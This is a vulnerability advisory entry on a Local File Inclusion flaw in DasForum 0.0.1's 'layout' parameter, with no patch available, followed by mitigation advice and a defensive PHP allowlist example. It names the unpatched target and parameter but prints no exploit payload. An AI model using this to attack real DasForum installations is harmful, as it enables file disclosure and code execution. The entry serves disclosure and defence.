Vendor: DasForum
By: cr4wl3r
CVSS: 7.5 HIGH
Local File Inclusion
CWE: 98
Product Name: DasForum
Affected Version From: 0.0.1
Affected Version To: 0.0.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
DasForum (layout) Local File Inclusion Exploit
DasForum is vulnerable to Local File Inclusion because user-supplied input is insufficiently sanitized. An attacker can exploit this by sending a crafted HTTP request with a malicious 'layout' parameter value. This allows the attacker to include arbitrary local files on the server, which can lead to the disclosure of sensitive information or the execution of arbitrary code.
Mitigation:
Validate the user-supplied 'layout' parameter before the application uses it to include a file, and sanitize user-supplied input so that maliciously crafted values are never passed to the application.
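One way to apply this validation to the 'layout' parameter, shown as an added example that is not DasForum's own code. It assumes a PHP 8 application (CWE-98 concerns PHP include/require statements); the layout names, directory and function name are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical layout names: assumptions for this example,
// not taken from DasForum's source.
const ALLOWED_LAYOUTS = ['default', 'dark', 'print'];
const FALLBACK_LAYOUT = 'default';

/**
 * Map an untrusted 'layout' value to a file inside $layoutDir, or fall
 * back to the default layout. The request value is only compared against
 * the allowlist; it is never concatenated into a path unchecked.
 */
function resolveLayout(mixed $requested, string $layoutDir): string
{
    $name = FALLBACK_LAYOUT;
    // Reject non-strings (e.g. ?layout[]=x) and anything not on the
    // allowlist. Strict comparison means values containing path
    // separators or other unexpected characters can never match.
    if (is_string($requested) && in_array($requested, ALLOWED_LAYOUTS, true)) {
        $name = $requested;
    }

    $base = realpath($layoutDir);
    if ($base === false) {
        throw new RuntimeException('layout directory missing');
    }

    // Defence in depth: the resolved file must exist and stay under $base,
    // which also catches symlinks pointing outside the layout directory.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    if ($path === false || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        throw new RuntimeException('layout file not available');
    }
    return $path;
}

// Usage in a request handler (hypothetical directory name):
// include resolveLayout($_GET['layout'] ?? null, __DIR__ . '/layout');
```

Because the included path is built from an allowlisted name rather than from the request value, an unrecognised 'layout' value falls back to the default instead of reaching `include`.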